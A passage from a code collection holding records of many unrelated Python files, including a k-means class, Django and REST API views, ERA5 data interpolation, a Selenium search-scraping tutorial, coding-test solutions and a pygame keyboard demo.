bgr2rgb[:]),\n bgr2rgb[:] >> poser['color_image'],\n rgb2gray[:] >> poser['image'],\n poser['debug_image'] >> display['input'],\n sync['image_ci'] >> camera_info['camera_info'],\n camera_info['K'] >> poser['K'],\n ]\nplasm.connect(graph)\n\nif __name__ == '__main__':\n import sys\n ecto_ros.init(sys.argv, \"opposing_dots_pose\", False)\n from ecto.opts import doit\n doit(plasm, description='Estimate the pose of an opposing dot fiducial.')\n\n","repo_name":"eitanme/object_recognition","sub_path":"test/openni_opposing_dots.py","file_name":"openni_opposing_dots.py","file_ext":"py","file_size_in_byte":2069,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"17187952252","text":"import numpy as np\nimport scipy.spatial as sp\nfrom scipy.io import arff\nfrom sklearn.metrics import confusion_matrix\n\n#-------------------------------------------------------------------------------------------------------------------------------------\nclass kmeans(object):\n\t\"\"\" This class defines the K-Means algorithm. \"\"\"\n\n\t# @brief: \n\t#\t\t Constructor method that receives the K parameter of the k means and the distance method to be used to compute\n\t#\t\t the distance between the samples/points. 
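Before the constructor notes continue, a quick usage sketch of this kmeans class on synthetic data (k=3 and the 2-D inputs are arbitrary illustration choices; the class defined in this record must be in scope):

    import numpy as np

    data = np.random.rand(100, 2)             # 100 random points in 2-D
    model = kmeans(k=3)                       # default metric: scipy's euclidean
    centroids = model.train(data, maxit=200, seed=42)
    labels = model.predict(data)              # cluster index (0..k-1) per point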
If the distance_metric argument is omitted, the algorithm will use a\n\t#\t\t euclidean distance.\n\tdef __init__(self, k, distance_metric = sp.distance.euclidean):\n\t\tself.k = k\n\t\tself.distance_metric = distance_metric\n\t\tself.centroids = None\n\n\t# @brief: \n\t#\t\t This is a private function that receives data points and returns a list where each entry i is the list of points\n\t#\t assigned to centroid i.\n\t# NOTE:\t This function will be useful for the training and prediction methods.\n\tdef __centroid_assignment(self, data):\n\t\tassignment = []\n\t\tfor i in range(0, self.k):\n\t\t\tassignment.append([])\n\t\t\t\n\t\t# this list will store the samples assigned to each centroid k\n\t\tfor i in range(0, len(data)):\n\t\t\tclosest_centroid = None\n\t\t\tdistance = float('inf') # initialize the distance to an infinite number\n\n\t\t\tfor j in range(0, self.k):\n\t\t\t\tif distance > self.distance_metric(data[i], self.centroids[j]):\n\t\t\t\t\tclosest_centroid = j\n\t\t\t\t\tdistance = self.distance_metric(data[i], self.centroids[j])\n\n\t\t\tassignment[closest_centroid].insert(0, data[i])\n\n\t\treturn assignment\n\n\t# @brief: \n\t#\t\t This function computes the k centroids given a dataset.\n\t#\t\t The maxit argument specifies the maximum number of iterations the algorithm will perform. Note that the algorithm can \n\t#\t\t stop before the maximum number of iterations if it converges.\n\tdef train(self, data, maxit = 200, seed = None):\n\t\t#---------------------------------------------------------------------------------\n\t\t# @brief: \n\t\t#\t\t Auxiliary local function that computes the mean point over a set of points.\n\t\t# NOTE: This function is an alternative to the np.mean function, which can give NaN. \n\t\tdef update_centroid(samples, centroid):\n\t\t\t# no update case: a centroid with no assigned samples keeps its value\n\t\t\tif len(samples) == 0:\n\t\t\t\treturn centroid\n\n\t\t\t# update case\n\t\t\tupdated_centroid = np.zeros(len(samples[0]))\n\t\t\tfor i in range(0, len(samples[0])):\n\t\t\t\tfor sample in samples:\n\t\t\t\t\tupdated_centroid[i] += sample[i]\n\t\t\t\tupdated_centroid[i] = updated_centroid[i]/len(samples)\n\t\t\treturn np.array(updated_centroid)\n\t\t#---------------------------------------------------------------------------------\n\t\trows = len(data)\n\n\t\t# random initialization of the centroids\n\t\tif seed:\n\t\t\tnp.random.seed(seed)\n\t\tself.centroids = [np.array(data[np.random.randint(0, rows)]) for _ in range(0, self.k)]\n\n\t\tupdate = True # variable to check if the algorithm has converged.\n\t\tcount = 0 # count the number of iterations\n\t\twhile (count < maxit and update):\n\n\t\t\tassignment = self.__centroid_assignment(data)\n\t\t\tupdate = False # assume we have converged; 
if in the next cycle the value changes to True, this assumption was wrong.\n\t\t\tfor k in range(0, self.k):\n\t\t\t\tupdated_centroid = update_centroid(assignment[k], self.centroids[k])\n\t\t\t\tif not np.array_equal(updated_centroid, self.centroids[k]):\n\t\t\t\t\tupdate = True\n\t\t\t\t\tself.centroids[k] = updated_centroid\n\t\t\tcount += 1\n\n\t\treturn self.centroids\n\n\t# @brief: \n\t#\t\t This algorithm receives a set of points and returns a list where each entry i has the value of the cluster \n\t#\t\t assigned to the ith sample in the data.\n\tdef predict(self, data):\n\t\tassignment = self.__centroid_assignment(data)\n\t\t# convert assignments to list in order to use the operation \"in\"\n\t\tfor i in range(0, self.k):\n\t\t\tfor j in range(0, len(assignment[i])):\n\t\t\t\tassignment[i][j] = assignment[i][j].tolist()\n\n\t\t# convert data to list to\n\t\tdata = data.tolist()\n\t\tlabels = [None]*len(data)\n\t\tfor i in range(0, len(data)):\n\t\t\tfor k in range(0, self.k):\n\t\t\t\tif data[i] in assignment[k]:\n\t\t\t\t\tlabels[i] = k\n\t\t\t\t\tbreak\n\t\treturn labels\n#-------------------------------------------------------------------------------------------------------------------------------------\n","repo_name":"ricardorei/Bioinformatics","sub_path":"lab5/kmeans.py","file_name":"kmeans.py","file_ext":"py","file_size_in_byte":4176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11173583097","text":"import cv2\r\nimport numpy as np\r\nimport serial\r\nimport middle\r\nimport camera\r\nfrom time import sleep\r\nfrom imgpreprocess import *\r\nfrom birdeye import *\r\nfrom utility import *\r\nfrom rplidar import RPLidar\r\nfrom stopping import *\r\nimport time\r\nimport os\r\nfrom math import floor\r\n\r\n# from yolov5.models.common import DetectMultiBackend\r\n# from yolov5.utils.general import non_max_suppression\r\n\r\n# detect_net = DetectMultiBackend(weights=\"./yolo_best_0205_openvino_model\")\r\n# labels_to_names = {0 : \"Crosswalk\", 1 : \"Green\", 2 : \"Red\", 3 : \"Car\"}\r\nport = 'COM7'\r\nPORT_NAME = 'COM20'\r\nlidar = RPLidar(PORT_NAME, timeout=3)\r\nbaudrate = 9600\r\nser = serial.Serial(port, baudrate, )\r\n\r\nif ser.is_open:\r\n ser.close()\r\n\r\nser.open()\r\nwidth = 640\r\nheight = 480\r\nslope_list = np.empty(1)\r\nstage = 0\r\ncapture = camera.CameraModule(width=640, height=480)\r\ncapture.open_cam(0)\r\nwhile True:\r\n try:\r\n if (stage == 0):\r\n start_time = time.time()\r\n end_time = start_time + 2\r\n while time.time() < end_time:\r\n message = 'a' + str(0) + 's' + str(75)\r\n ser.write(message.encode())\r\n time.sleep(0.025)\r\n stage = 1\r\n if (stage == 1):\r\n for scan in lidar.iter_scans():\r\n for (_, angle, distance) in scan:\r\n if (floor(angle) == 90 or floor(angle) == 91 or floor(angle) == 89):\r\n print(floor(angle), distance)\r\n if (500 str:\n return f'temp_word={self._temp_word} index_list={self.index_list}'\n\n def append_char(self, char):\n '''\n 추가하는 문자(char) 와 객체에 보관중인 temp_word 를 합쳐서 사전에 있는지 확인\n 사전에 있으면 temp_word 에 char 를 합체\n 사전에 없으면 temp_word 의 인덱스를 구하고 temp_word 를 비워고 char 를 temp_word 에 대입\n '''\n if self._temp_word+char in self._word_dict :\n self._temp_word += char\n else :\n self.append(self._temp_word+char)\n self.index_list.append(self._word_dict.get(self._temp_word))\n self._temp_word = char\n\n def flush(self):\n '''\n 미처리한 temp_word 의 인덱스를 구한다.\n '''\n self.index_list.append(self._word_dict.get(self._temp_word))\n self._temp_word = ''\n\n def append(self, 
word): # register the word in the dictionary.\n self.last_value += 1\n self._word_dict[word] = self.last_value\n\ndef solution(msg):\n answer = []\n word_dict = WordDict()\n for c in msg:\n word_dict.append_char(c)\n # print(f'{c} after append : {word_dict}')\n word_dict.flush()\n # print(f'after flush : {word_dict}')\n answer = word_dict.index_list\n return answer\n\nprint(solution('KAKAO'))\nprint(solution('TOBEORNOTTOBEORTOBEORNOT'))\nprint(solution('ABABABABABABABAB'))\nprint(solution('A'))\n","repo_name":"csw180/coding_py","sub_path":"pg17684.py","file_name":"pg17684.py","file_ext":"py","file_size_in_byte":1827,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"39563385800","text":"# Python Class Decorator\n\nclass MyDecorator(object):\n def __init__(self, func):\n self._func = func\n \n def __call__(self, name):\n print('Some decoration code before method')\n result = self._func(name)\n print('Some decoration code after method')\n return 'Decorated result: {}'.format(result)\n\ndef my_method(name):\n result = 'My name is {}'.format(name)\n print(result)\n return result\n \n@MyDecorator\ndef my_method_decorated(name):\n result = 'My name is {}'.format(name)\n print(result)\n return result\n \n\nif __name__ == '__main__':\n # Equivalent ways to apply a class decorator\n \n # Call method my_method decorated with decorator class MyDecorator \n # without using syntactic sugar @MyDecorator\n print((MyDecorator(my_method))('Peter'))\n \n # Call method my_method_decorated decorated with MyDecorator\n # using syntactic sugar @MyDecorator\n print(my_method_decorated('Peter'))\n\n\n\n","repo_name":"hooppler/PythonTipsAndTricks","sub_path":"decorators/class_decorator.py","file_name":"class_decorator.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
+{"seq_id":"25431077894","text":"from selenium import webdriver\n\nbrowser=webdriver.Chrome(\"C:\\Program Files\\PythonWorkspace\\chromedriver.exe\")\n# (\"executable location\") can be omitted if the driver is in the same folder\nbrowser.get(\"https://naver.com\")\nelem = browser.find_element_by_class_name(\"link_login\")\nelem.click() # click the element stored in elem\nbrowser.refresh() # refresh\nbrowser.back() # go back \nelem = browser.find_element_by_id(\"query\") # search box\nfrom selenium.webdriver.common.keys import Keys # for keyboard input\nelem.send_keys(\"나도코딩\")\nelem.send_keys(Keys.ENTER) # search by pressing Enter\n# elem = browser.find_element_by_tag_name(\"a\") # get one element object with tag \"a\"\nelem = browser.find_elements_by_tag_name(\"a\") # get all element objects with tag \"a\"\nfor e in elem:\n e.get_attribute(\"href\") \n # gets the value of an attribute of the element; unlike BeautifulSoup4\n continue\n\n# searching on Daum\nbrowser.get(\"https://daum.net\")\nelem = browser.find_element_by_name(\"q\")\nelem.send_keys(\"나도코딩\")\nelem.send_keys(Keys.ENTER)\nbrowser.back()\nelem = browser.find_element_by_name(\"q\") # the page changed, so set up the element again\nelem.send_keys(\"나도코딩\")\nelem = browser.find_element_by_xpath(\"//*[@id='daumSearch']/fieldset/div/div/button[2]\")\n# in Chrome DevTools, right-click - Copy - Copy XPath to get the xpath value\n# if the xpath value contains \"\", change them to '' since they clash with the enclosing \"\"\nelem.click()\n\n# browser.close() closes one browser window\n# browser.quit() quits the browser\n# exit() exits Python in the terminal\n\ninput()","repo_name":"te-ing/study","sub_path":"NADOCODING/webscraping_basic/13_selenium.py","file_name":"13_selenium.py","file_ext":"py","file_size_in_byte":1616,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
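The WordDict class in the pg17684.py record above is an LZW-style dictionary coder: keep growing the current word while it stays in the dictionary, and when it falls out, emit the index of the longest match and register the extended word. The same idea as one standalone function, written from scratch here for illustration (indexing follows the problem's 1-based A..Z convention):

    def lzw_encode(msg):
        table = {chr(ord('A') + i): i + 1 for i in range(26)}   # seed: A..Z -> 1..26
        out, w = [], ''
        for c in msg:
            if w + c in table:
                w += c                          # keep growing the current word
            else:
                out.append(table[w])            # emit index of the longest match
                table[w + c] = len(table) + 1   # register the extended word
                w = c
        out.append(table[w])                    # flush the remainder
        return out

    assert lzw_encode('KAKAO') == [11, 1, 27, 15]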
+{"seq_id":"18676463686","text":"\"\"\"\n Evaluation metrics for common tasks.\n\"\"\"\n\nimport mxnet as mx\nif mx.__version__ < \"2.0.0\":\n from mxnet.metric import EvalMetric\nelse:\n from mxnet.gluon.metric import EvalMetric\n\n__all__ = ['LossValue']\n\n\nclass LossValue(EvalMetric):\n \"\"\"\n Computes simple loss value fake metric.\n\n Parameters:\n ----------\n name : str\n Name of this metric instance for display.\n output_names : list of str, or None\n Name of predictions that should be used when updating with update_dict.\n By default include all predictions.\n label_names : list of str, or None\n Name of labels that should be used when updating with update_dict.\n By default include all labels.\n \"\"\"\n def __init__(self,\n name=\"loss\",\n output_names=None,\n label_names=None):\n super(LossValue, self).__init__(\n name,\n output_names=output_names,\n label_names=label_names)\n\n def update(self, labels, preds):\n \"\"\"\n Updates the internal evaluation result.\n\n Parameters:\n ----------\n labels : None\n Unused argument.\n preds : list of `NDArray`\n Loss values.\n \"\"\"\n loss = sum([ll.mean().asscalar() for ll in preds]) / len(preds)\n self.sum_metric += loss\n self.global_sum_metric += loss\n self.num_inst += 1\n self.global_num_inst += 1\n","repo_name":"osmr/imgclsmob","sub_path":"gluon/metrics/metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":1444,"program_lang":"python","lang":"en","doc_type":"code","stars":2864,"dataset":"github-code","pt":"37"} +{"seq_id":"29441050134","text":"K, N = map(int, input().split())\nlans = [int(input()) for _ in range(K)]\n\ndef calc_count(length):\n cnt = 0\n for lan in lans:\n cnt += (lan // length)\n return cnt\n\nl, r = 1, max(lans)\nres = -1\nwhile l <= r:\n mid = (l + r) // 2\n if calc_count(mid) >= N:\n l = mid + 1\n res = mid\n else:\n r = mid - 1\nprint(res)\n","repo_name":"Acka1357/codingtest-java-20","sub_path":"Part1_강의자료/Ch07_이분탐색/문제별코드/1654_랜선자르기/1654.py","file_name":"1654.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"71420242666","text":"from django.contrib import admin\nfrom django.urls import path, include\nfrom . 
import views\n\napp_name = 'musicapp'\nurlpatterns = [\n path('station//nexttrack',views.stationnextsong,name='stationnextsong'),\n path('randomsong',views.randomsong, name='randomsong'),\n path('playlist/new',views.playlistcreate,name='createpl'),\n path('playlist/all',views.playlistindex,name='indexpl'),\n path('playlist//removesong/',views.removesong,name='removesong'),\n path('playlist/',views.playlistshow,name='showpl'),\n path('song//createtag',views.createtag,name='createtag'),\n path('song//remove/',views.removetag,name='removetag'),\n path('song//add/',views.addtag,name='addtag'),\n path('song/',views.showsong, name='showsong'),\n path('genre/all',views.genreindex,name='indexgenre'),\n path('station//likesong/',views.likesong,name='likesong'),\n path('station//dislikesong/',views.dislikesong,name='dislikesong'),\n path('station/',views.stationshow,name='showstation'),\n path('tag/all',views.tagindex,name='indextag'),\n\n]\n","repo_name":"kazarinoff/librandora","sub_path":"apps/music/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1125,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71317473068","text":"import shapefile as shp\n\n\ndef ParseShapefile(filename):\n \"\"\"\n Extract GPS points from a shapefile.\n\n Args;\n (String) filename: the address of a shapefile.\n Return:\n (list) shapePoint: a list of GPS point in the given shapefile.\n \"\"\"\n\n # Read the shapefile and get its shape records.\n ctr = shp.Reader(filename)\n ShapeRecords = ctr.iterShapeRecords()\n\n # For storing GPS data of roads.\n shapePoint = []\n\n # Extract GPS data of major roads that are the types of \n # 'trunk' and 'primary'.\n for sr in ShapeRecords:\n if sr.record[0] in ['trunk', 'primary']:\n shapePoint.append([])\n for point in sr.shape.points:\n shapePoint[-1].append((point[1], point[0]))\n\n return shapePoint\n\n\n#ParseShapefile(\"/Users/Jason/GitHub/RoadSeftey/RoadSafety/Data/shapefile/delhi_highway/delhi_highway.shp\")\n","repo_name":"jasonlingo/RoadSafety","sub_path":"Map/Shapefile.py","file_name":"Shapefile.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70126297707","text":"from scipy.ndimage import map_coordinates\nimport numpy as np\nimport xarray as xr\n# import time\nimport warnings\nwarnings.filterwarnings('ignore')\nimport datetime as dt\nimport os\n\nclass era5():\n def __init__(self, era5_dir = '/badc/ecmwf-era5/data/oper/an_sfc/%04d/%02d/%02d',\n era5t_dir = '/badc/ecmwf-era5t/data/oper/an_sfc/%04d/%02d/%02d'):\n self.era5_dir = era5_dir\n self.era5t_dir = era5t_dir\n\n\n #key is the variable name, value is the file name convention\n self.era5_vars = { 'd2m': '2d', # 2 metre dewpoint temperature\n 't2m': '2t', # 2 metre temperature\n 'skt': 'skt', # skin temperature (including see)\n 'tcwv': 'tcwv', # total column water vapour\n 'sd': 'sd', # snow depth\n 'asn': 'asn', # snow albedo\n 'siconc': 'ci', # Sea ice area fraction\n 'u10': '10u', # 10 metre U wind component\n 'v10': '10v', # 10 metre V wind component\n 'cape': 'cape', # Convective available potential energy\n 'msl': 'msl', # Mean sea level pressure\n 'sst': 'sst', # Sea surface temperature\n 'tcc': 'tcc', # Total cloud cover\n }\n\n def get_coord(self, xi, x, extrap = False):\n \"\"\"this is a method to estimate coordinates of query points\n with respect to the coordinate grid points \"\"\"\n\n tmp_dx = np.unique(np.diff(x))\n #check 
if the input grid is regular\n is_regular = (tmp_dx.size ==1)\n #check if the input points are in the ascending order\n is_ascending = (x[0](x.size-1)] = (x.size-1)\n\n else:\n if is_ascending:\n c = np.interp(xi, x, np.arange(x.size))\n if extrap:\n ind_extr = np.where(xix[-1])\n dx = x[-1]-x[-2]\n c_extrap = (xi[ind_extr]-x[-1])/dx\n c[ind_extr] = c_extrap\n\n\n else:\n ind_sort = np.arange(x.size)[::-1]\n c = np.interp(xi, x[::-1], ind_sort)\n if extrap:\n ind_extr = np.where(xi>x[0])\n dx = x[1]-x[0]\n c_extrap = (xi[ind_extr]-x[0])/dx\n c[ind_extr] = c_extrap\n\n ind_extr = np.where(xi=0, lon_da+360.)\n\n if interp == 'xarray':\n\n tmp_da = ds_ecmwf[era5_v].isel(longitude = [0,])\n tmp_da['longitude'] = tmp_da['longitude']+ 360\n\n da_interp = xr.combine_nested([ds_ecmwf[era5_v], tmp_da],\n concat_dim = 'longitude', **interp_kwargs)\n\n name_lon = lon_da.name\n name_lat = lat_da.name\n name_time = time_da.name\n\n if name_lon == 'longitude':\n lon_da.name = 'Lon'\n if name_lat == 'latitude':\n lat_da.name = 'Lat'\n if name_time == 'time':\n time_da.name = 'Time'\n\n da_out = da_interp.interp(longitude = lon_da,\n latitude = lat_da,\n time = time_da, )\n da_out = da_out.compute()\n\n\n da_out = da_out.reset_coords(names=\"longitude\", drop=True)\n da_out = da_out.reset_coords(names=\"latitude\", drop=True)\n da_out = da_out.reset_coords(names=\"time\", drop=True)\n\n if name_lon == 'longitude':\n da_out = da_out.rename({'Lon': 'longitude'})\n if name_lat == 'latitude':\n da_out = da_out.rename({'Lat': 'latitude'})\n if name_time == 'time':\n da_out = da_out.rename({'Time': 'time'})\n # print('%.1f' % (time.time() - now,))\n return da_out\n if interp == 'map_coordinates':\n\n da_dims = ds_ecmwf[era5_v].dims\n coords_dict = {'longitude': self.get_coord(\n xi = lon_da.data, x = ds_ecmwf.longitude.data, extrap = False),\n 'latitude': self.get_coord(\n xi = lat_da.data, x = ds_ecmwf.latitude.data, extrap = False),\n 'time': self.get_coord(\n xi = time_da.data, x = ds_ecmwf.time.data, extrap = False),}\n\n X = np.array([coords_dict[k] for k in da_dims])\n\n interp_val = map_coordinates(ds_ecmwf[era5_v].data,\n coordinates = X, mode = 'grid-wrap',)\n\n da_out = xr.DataArray(data = interp_val, dims = lon_da.dims,\n coords = {lon_da.name: lon_da, lat_da.name: lat_da, time_da.name: time_da})\n # print('%.1f' % (time.time() - now,))\n return da_out\n\n\n","repo_name":"mrozkamil/gpym","sub_path":"gpym/era5.py","file_name":"era5.py","file_ext":"py","file_size_in_byte":7030,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"34995693013","text":"from rest_framework import status\nfrom rest_framework.decorators import api_view\nfrom rest_framework.response import Response\nfrom pathlib import Path\nfrom rest_framework.decorators import parser_classes\nfrom rest_framework.parsers import MultiPartParser, FormParser\n\n# import the factory model now.\nfrom base.models import Factory\n#importing the serializer as well\nfrom .serializers import FactorySerializer, ProductSerializer\n\n#importing the product model.\nfrom base.models import Product\n\nfrom base.azure_file_controller import ALLOWED_EXTENTIONS, download_blob, upload_file_to_blob, delete_blob_client\n\n@api_view(['GET'])\ndef getRoutes(request):\n routes = ['GET endpoint at /api that is home!',\n 'GET endpoint at /api/factories to get the factories',\n 'GET endpoint at /api/factories/:id to get details of a particular factory']\n return Response(routes)\n\n@api_view(['GET', 
'POST'])\ndef getFactories(request):\n if request.method == 'GET':\n factories = Factory.objects.all()\n serializer = FactorySerializer(factories, many = True) #this will be query set, therefore to display as JSON, use serializer. many=True just serializes all the objects\n return Response(serializer.data) \n elif request.method == 'POST':\n serializer = FactorySerializer(data = request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status = status.HTTP_201_CREATED)\n return Response(serializer.errors, status = status.HTTP_400_BAD_REQUEST)\n\n@api_view(['GET', 'POST'])\n@parser_classes([MultiPartParser, FormParser])\ndef getAFactory(request, factoryId, format = None):\n if request.method == 'GET':\n try:\n products = Product.objects.filter(factory = factoryId)\n except Product.DoesNotExist:\n return Response(status = status.HTTP_404_NOT_FOUND)\n\n serializer = ProductSerializer(products, many = True)\n return Response(serializer.data)\n elif request.method == 'POST':\n file = request.data['image']\n print(file.name)\n \n \n\n serializer = ProductSerializer(data = request.data)\n print(serializer.is_valid())\n if serializer.is_valid():\n new_file = upload_file_to_blob(file)\n print(new_file)\n \n request.data['image'].name = new_file\n serializer.save()\n return Response(serializer.data, status = status.HTTP_201_CREATED)\n return Response(serializer.errors, status = status.HTTP_400_BAD_REQUEST)\n\n@api_view(['GET', 'PUT', 'DELETE'])\n@parser_classes([MultiPartParser, FormParser])\ndef getAProduct(request, factoryId, productId, format = None):\n try:\n product = Product.objects.filter(factory = factoryId).get(id = productId)\n except Product.DoesNotExist:\n return Response(status = status.HTTP_404_NOT_FOUND)\n \n if request.method == 'GET':\n serializer = ProductSerializer(product, many = False)\n return Response(serializer.data)\n elif request.method == 'PUT':\n serializer = ProductSerializer(product, data = request.data)\n if serializer.is_valid():\n file = request.FILES['image']\n # print(type(file))\n # ext = Path(file.name).suffix\n # # print(data['id'])\n # # print()\n\n new_file = upload_file_to_blob(file)\n # print(new_file)\n product.image.name = new_file\n request.data['image'].name = new_file\n serializer.save()\n return Response(serializer.data)\n return Response(serializer.errors, status = status.HTTP_400_BAD_REQUEST)\n elif request.method == 'DELETE':\n serializer = ProductSerializer(product, many=False)\n delete_blob_client(str(product.image.name))\n product.delete()\n return Response(serializer.data, status = status.HTTP_204_NO_CONTENT)\n \n\n\n","repo_name":"prateekgandhi718/CP-complete-backend","sub_path":"base/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39361705741","text":"from functools import partial\nimport json\nimport math\nimport warnings\n\nfrom jsonmerge import merge\n\nfrom . 
import augmentation, layers, models, utils\n\n\ndef load_config(file):\n defaults = {\n 'model': {\n 'sigma_data': 1.,\n 'patch_size': 1,\n 'dropout_rate': 0.,\n 'augment_wrapper': True,\n 'augment_prob': 0.,\n 'mapping_cond_dim': 0,\n 'unet_cond_dim': 0,\n 'cross_cond_dim': 0,\n 'cross_attn_depths': None,\n 'skip_stages': 0,\n 'has_variance': False,\n },\n 'dataset': {\n 'type': 'imagefolder',\n },\n 'optimizer': {\n 'type': 'adamw',\n 'lr': 1e-4,\n 'betas': [0.95, 0.999],\n 'eps': 1e-6,\n 'weight_decay': 1e-3,\n },\n 'lr_sched': {\n 'type': 'inverse',\n 'inv_gamma': 20000.,\n 'power': 1.,\n 'warmup': 0.99,\n },\n 'ema_sched': {\n 'type': 'inverse',\n 'power': 0.6667,\n 'max_value': 0.9999\n },\n }\n config = json.load(file)\n return merge(defaults, config)\n\n\ndef make_model(config):\n config = config['model']\n assert config['type'] == 'image_v1'\n model = models.ImageDenoiserModelV1(\n config['input_channels'],\n config['mapping_out'],\n config['depths'],\n config['channels'],\n config['self_attn_depths'],\n config['cross_attn_depths'],\n patch_size=config['patch_size'],\n dropout_rate=config['dropout_rate'],\n mapping_cond_dim=config['mapping_cond_dim'] + (9 if config['augment_wrapper'] else 0),\n unet_cond_dim=config['unet_cond_dim'],\n cross_cond_dim=config['cross_cond_dim'],\n skip_stages=config['skip_stages'],\n has_variance=config['has_variance'],\n )\n if config['augment_wrapper']:\n model = augmentation.KarrasAugmentWrapper(model)\n return model\n\n\ndef make_denoiser_wrapper(config):\n config = config['model']\n sigma_data = config.get('sigma_data', 1.)\n has_variance = config.get('has_variance', False)\n if not has_variance:\n return partial(layers.Denoiser, sigma_data=sigma_data)\n return partial(layers.DenoiserWithVariance, sigma_data=sigma_data)\n\n\ndef make_sample_density(config):\n sd_config = config['sigma_sample_density']\n sigma_data = config['sigma_data']\n if sd_config['type'] == 'lognormal':\n loc = sd_config['mean'] if 'mean' in sd_config else sd_config['loc']\n scale = sd_config['std'] if 'std' in sd_config else sd_config['scale']\n return partial(utils.rand_log_normal, loc=loc, scale=scale)\n if sd_config['type'] == 'loglogistic':\n loc = sd_config['loc'] if 'loc' in sd_config else math.log(sigma_data)\n scale = sd_config['scale'] if 'scale' in sd_config else 0.5\n min_value = sd_config['min_value'] if 'min_value' in sd_config else 0.\n max_value = sd_config['max_value'] if 'max_value' in sd_config else float('inf')\n return partial(utils.rand_log_logistic, loc=loc, scale=scale, min_value=min_value, max_value=max_value)\n if sd_config['type'] == 'loguniform':\n min_value = sd_config['min_value'] if 'min_value' in sd_config else config['sigma_min']\n max_value = sd_config['max_value'] if 'max_value' in sd_config else config['sigma_max']\n return partial(utils.rand_log_uniform, min_value=min_value, max_value=max_value)\n if sd_config['type'] == 'v-diffusion':\n min_value = sd_config['min_value'] if 'min_value' in sd_config else 0.\n max_value = sd_config['max_value'] if 'max_value' in sd_config else float('inf')\n return partial(utils.rand_v_diffusion, sigma_data=sigma_data, min_value=min_value, max_value=max_value)\n if sd_config['type'] == 'split-lognormal':\n loc = sd_config['mean'] if 'mean' in sd_config else sd_config['loc']\n scale_1 = sd_config['std_1'] if 'std_1' in sd_config else sd_config['scale_1']\n scale_2 = sd_config['std_2'] if 'std_2' in sd_config else sd_config['scale_2']\n return partial(utils.rand_split_log_normal, loc=loc, scale_1=scale_1, 
scale_2=scale_2)\n raise ValueError('Unknown sample density type')\n","repo_name":"deforum-art/deforum-stable-diffusion","sub_path":"src/k_diffusion/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":4258,"program_lang":"python","lang":"en","doc_type":"code","stars":1974,"dataset":"github-code","pt":"37"} +{"seq_id":"33233952896","text":"from rest_framework import serializers\nfrom rest_framework.fields import MultipleChoiceField, empty, html\n\n\nclass DuplicateMultipleChoiceField(MultipleChoiceField):\n\n def to_internal_value(self, data):\n if isinstance(data, str) or not hasattr(data, '__iter__'):\n self.fail('not_a_list', input_type=type(data).__name__)\n if not self.allow_empty and len(data) == 0:\n self.fail('empty')\n\n return [\n super(MultipleChoiceField, self).to_internal_value(item)\n for item in data\n ]\n\n\nclass DepositWalletSerializer(serializers.Serializer):\n COIN_CHOICES = (\n (100, '100 cents'),\n (50, '50 cents'),\n (20, '20 cents'),\n (10, '10 cents'),\n (5, '5 cents')\n ) # choices must be ordered\n coins = DuplicateMultipleChoiceField(required=True, choices=COIN_CHOICES, allow_empty=False)\n\n","repo_name":"pedroserrudo/vending-mvp","sub_path":"vending/apps/wallet/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29781007023","text":"\"\"\"\nFind all possible combinations of k numbers that add up to \na number n, given that only numbers from 1 to 9 can be used \nand each combination should be a unique set of numbers.\n\nNote:\n\nAll numbers will be positive integers.\nThe solution set must not contain duplicate combinations.\nExample 1:\n\nInput: k = 3, n = 7\nOutput: [[1,2,4]]\n\"\"\"\n\nclass Solution:\n def combinationSum3(self, k: int, n: int) -> List[List[int]]:\n ans = []\n\n def helper(k, n, pre, start):\n if k == 1 and 10 > n >= start:\n ans.append(pre+[n])\n for i in range(start, 10):\n if n - i < start:\n break\n helper(k-1, n-i, pre+[i], i+1)\n\n helper(k, n, [], 1)\n\n return ans\n","repo_name":"EpsilonHF/Leetcode","sub_path":"Python/216.py","file_name":"216.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26363243601","text":"from random import randint\n\nimport pygame\nfrom constants import *\nfrom output import *\n\n\nclass DemoClass:\n \"\"\"规范样例\n\n 模块命名采用小写+下划线‘_’\n 类命名采用驼峰命名法\n 一个模块中包含若干相似类,不必一个类分出一个模块来\n\n 书山有路勤为径\n 学海无涯苦作舟\n \"\"\"\n\n def demo(self):\n \"\"\"函数样例\n 和Java不同的是,这里的函数说明写在函数体里面\n :return: 一条hello字符串\n \"\"\"\n statement_hello = \"Hello world.\\nHello Demo.\"\n # print(statement_hello)\n return statement_hello\n\n def demo_add(self, a, b):\n return a + b\n\n\nclass KeyInput:\n \"\"\"\n 控制台输出键盘状态\n ==> 输出转到窗体\n \"\"\"\n\n def __init__(self) -> None:\n super().__init__()\n self.__lunch__()\n\n def __lunch__(self):\n # 初始化\n pygame.init()\n screen = pygame.display.set_mode([Window.SCREEN_WIDTH, Window.SCREEN_HEIGHT])\n pygame.display.set_caption(Window.CAPTION)\n status = {}\n while True:\n pygame.time.Clock().tick(256)\n for event in pygame.event.get():\n info = []\n if event.type == QUIT: # 退出\n quit()\n exit()\n elif event.type == 